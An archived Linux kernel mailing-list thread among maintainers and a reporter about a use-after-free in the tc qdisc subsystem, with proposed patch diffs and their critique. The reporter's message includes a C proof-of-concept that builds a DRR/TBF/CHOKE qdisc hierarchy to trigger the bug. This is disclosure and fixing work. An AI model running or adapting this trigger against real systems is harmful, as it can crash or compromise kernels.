lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <CAM0EoMnv6YAUJVEFx2mGrP75G8wzRiN+Z=hSfRAz8ia0Fe4vBw@mail.gmail.com>
Date: Sat, 28 Jun 2025 17:26:59 -0400
From: Jamal Hadi Salim <jhs@...atatu.com>
To: Mingi Cho <mgcho.minic@...il.com>
Cc: Cong Wang <xiyou.wangcong@...il.com>, security@...nel.org, 
	Jiri Pirko <jiri@...nulli.us>, Linux Kernel Network Developers <netdev@...r.kernel.org>
Subject: Re: Use-after-free in Linux tc subsystem (v6.15)

On Thu, Jun 26, 2025 at 1:11 AM Mingi Cho <mgcho.minic@...il.com> wrote:
>
> On Fri, Jun 20, 2025 at 8:24 PM Jamal Hadi Salim <jhs@...atatu.com> wrote:
> >
> > On Wed, Jun 18, 2025 at 4:17 PM Jamal Hadi Salim <jhs@...atatu.com> wrote:
> > >
> > > On Mon, Jun 16, 2025 at 9:03 PM Cong Wang <xiyou.wangcong@...il.com> wrote:
> > > >
> > > > On Sun, Jun 15, 2025 at 10:02 PM Cong Wang <xiyou.wangcong@...il.com> wrote:
> > > > >
> > > > > On Thu, Jun 12, 2025 at 2:18 PM Cong Wang <xiyou.wangcong@...il.com> wrote:
> > > > > >
> > > > > > Hi Mingi,
> > > > > >
> > > > > > Thanks for your report!
> > > > > >
> > > > > > I won't have time to look into this until this Sunday, if you or
> > > > > > anyone else have
> > > > > > time before that, please feel free to work on a patch. Otherwise, I will take a
> > > > > > look this Sunday.
> > > > >
> > > > > I am testing the attached patch, I will take a deeper look tomorrow.
> > > >
> > > > It is more complicated than I thought. I think we need to rollback all
> > > > the previous enqueue operations, but it does not look pretty either.
> > > >
> > > > Jamal, do you like the attached fix? I don't have any better ideas
> > > > so far. :-/
> > > >
> > >
> > > I just got back - let me look at it tomorrow. Immediate reaction is i
> > > would suspect netem
> >
> > Spent time yesterday and there are two potential approaches
> > (attached), both of which fix the issue but i am not satisfied with
> > either.
> >
> > The root cause being exploited here is there are some qdisc's whose
> > peek() drops packets - but given peek() doesnt return a code, the
> > parent is unaware of what happened.
> >
> > drr_fix.diff
> > avoids making a class active  by detecting whether drr_qlen_notify was
> > called between after enqueue (even though that enqueue succeeded), in
> > that case, returns a NET_XMIT_SUCCESS | __NET_XMIT_BYPASS which ensure
> > we don't add the class to drr.
> >
> > This fixes the UAF but it would require an analogous fix for other
> > qdiscs with similar behavior (ets, hfsc, ...)
> >
> > qfq_netem_child_fix.diff
> > piggy backs on your tbf patch and detects whether
> > qdisc_tree_reduce_backlog was called after qfq's peeked its child
> > (netem in this repro) in enqueue.
> > This would also require fixing other qdiscs.
> >
> > TBH, while both approaches fix the UAF, IMO they are short term hacks
> > and i am sure Mingi and co will find yet another way to send netlink
> > messages to config a _nonsensical hierarchy of qdiscs_ (as was this
> > one!) to create yet another UAF.
> >
> > My suggestion is we go back to a proposal i made a few moons back:
> > create a mechanism to disallow certain hierarchies of qdiscs, ex in
> > this case disallow qfq from being the ancestor of "qdiscs that may
> > drop during peek" (such as netem). Then we can just keep adding more
> > "disallowed configs" that will be rejected via netlink.
> > And TBH, i feel like obsoleting qfq altogether - the author doesnt
> > even respond to emails.
> >
> > cheers,
> > jamal
>
> Hello,
>
> I think the testcase I reported earlier actually contains two
> different bugs. The first is returning SUCCESS with an empty TBF qdisc
> in tbf_segment, and the second is returning SUCCESS with an empty QFQ
> qdisc in qfq_enqueue.
>

Please join the list where a more general solution is being discussed here:
https://lore.kernel.org/netdev/aF847kk6H+kr5kIV@pop-os.localdomain/

cheers,
jamal
> The first bug is present in TBF qdisc, so the UAF is also triggered
> when using a qdisc other than QFQ. Below is a POC that shows how the
> TBF qdisc can be made empty by using a CHOKE qdisc instead of a QFQ.
>
> #define _GNU_SOURCE
>
> #include <arpa/inet.h>
> #include <fcntl.h>
> #include <stdlib.h>
> #include <unistd.h>
> #include <linux/udp.h>
>
> #ifndef SOL_UDP
> #define SOL_UDP 17 // UDP protocol value for setsockopt
> #endif
>
> void loopback_send (uint64_t size) {
>     struct sockaddr iaddr = { AF_INET };
>     char data[0x1000] = {0,};
>
>     int inet_sock_fd = socket(PF_INET, SOCK_DGRAM, 0);
>
>     int gso_size = 1300;
>
>     setsockopt(inet_sock_fd, SOL_UDP, UDP_SEGMENT, &gso_size, sizeof(gso_size));
>
>     connect(inet_sock_fd, &iaddr, sizeof(iaddr));
>
>     write(inet_sock_fd, data, size);
>
>     close(inet_sock_fd);
> }
>
> int main(int argc, char **argv) {
>     system("ip link set dev lo up");
>     system("ip link set dev lo mtu 1500");
>
>     system("tc qdisc add dev lo root handle 1: drr");
>     system("tc filter add dev lo parent 1: basic classid 1:1");
>     system("tc class add dev lo parent 1: classid 1:1 drr");
>     system("tc class add dev lo parent 1: classid 1:2 drr");
>
>     system("tc qdisc add dev lo parent 1:1 handle 2: tbf rate 1Mbit
> burst 1514 latency 50ms");
>
>     system("tc qdisc add dev lo parent 2:1 handle 3: choke limit 2
> bandwidth 1kbit min 1 max 2 burst 1");
>
>     loopback_send(2000);
>
>     system("tc class del dev lo classid 1:1");
>
>     system("timeout 0.1 ping -c 1 -W0.01 localhost > /dev/null");
> }
>
> My opinion is that creating separate patches for each bug would be an
> easier way to approach the problem.
>
> I tested the suggested patch and found some possible issues.
>
> diff --git a/net/sched/sch_qfq.c b/net/sched/sch_qfq.c
> index bf1282cb22eb..6d85da21c4b8 100644
> --- a/net/sched/sch_qfq.c
> +++ b/net/sched/sch_qfq.c
> @@ -1258,7 +1258,17 @@ static int qfq_enqueue(struct sk_buff *skb,
> struct Qdisc *sch,
>     agg = cl->agg;
>     /* if the class is active, then done here */
>     if (cl_is_active(cl)) {
> -       if (unlikely(skb == cl->qdisc->ops->peek(cl->qdisc)) &&
> +       const u32 pre_peek_backlog = sch->qstats.backlog;
> +
> +       skb = cl->qdisc->ops->peek(cl->qdisc);
> +       /* Address corner case where a child qdisc dropped the packet
> +        * in peek after enqueue returned success.
> +        * Qdiscs like netem may exhibit this behaviour.
> +        */
> +       if (unlikely(sch->qstats.backlog < pre_peek_backlog))
> +           return NET_XMIT_SUCCESS | __NET_XMIT_BYPASS;
> +
> +       if (unlikely(skb) &&
>             list_first_entry(&agg->active, struct qfq_class, alist)
>             == cl && cl->deficit < len)
>             list_move_tail(&cl->alist, &agg->active);
>
> First, in the proposed patch, the peek function of qfq_enqueue checks
> qstats.backlog to know if a packet has been dropped. However, since
> qstats.backlog decreases during the normal peek process, it would be
> better to use the q.qlen.
>
> diff --git a/net/sched/sch_api.c b/net/sched/sch_api.c
> index c5e3673aadbe..10fb72fef98e 100644
> --- a/net/sched/sch_api.c
> +++ b/net/sched/sch_api.c
> @@ -814,6 +814,11 @@ void qdisc_tree_reduce_backlog(struct Qdisc *sch,
> int n, int len)
>             WARN_ON_ONCE(parentid != TC_H_ROOT);
>             break;
>         }
> +
> +       if (unlikely((!sch->q.qlen && n) ||
> +                (!sch->qstats.backlog && len)))
> +           continue;
> +
>         cops = sch->ops->cl_ops;
>         if (notify && cops->qlen_notify) {
>             cl = cops->find(sch, parentid);
>
> Also, if the qdisc_tree_reduce_backlog function excludes cases where
> qlen is 0, as in the above patch, the normal tbf qdisc features may
> not work.
>
> static int tbf_segment(struct sk_buff *skb, struct Qdisc *sch,
>                struct sk_buff **to_free)
> ...
>     sch->q.qlen += nb;
>     sch->qstats.backlog += len;
>     if (nb > 0) {
>         qdisc_tree_reduce_backlog(sch, 1 - nb, prev_len - len);
>         consume_skb(skb);
>         return NET_XMIT_SUCCESS;
>     }
>
> For example, qlen can be 0 when calling qdisc_tree_reduce_backlog on
> tbf_segment in the code above.
>
> Additionally, I believe that using the peek function in the enqueue
> function can increase the complexity of qdisc and can lead to a number
> of issues. Therefore, I believe that avoiding the use of peek in the
> enqueue function will reduce the chance of introducing bugs.
>
> Thanks,
> Mingi

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ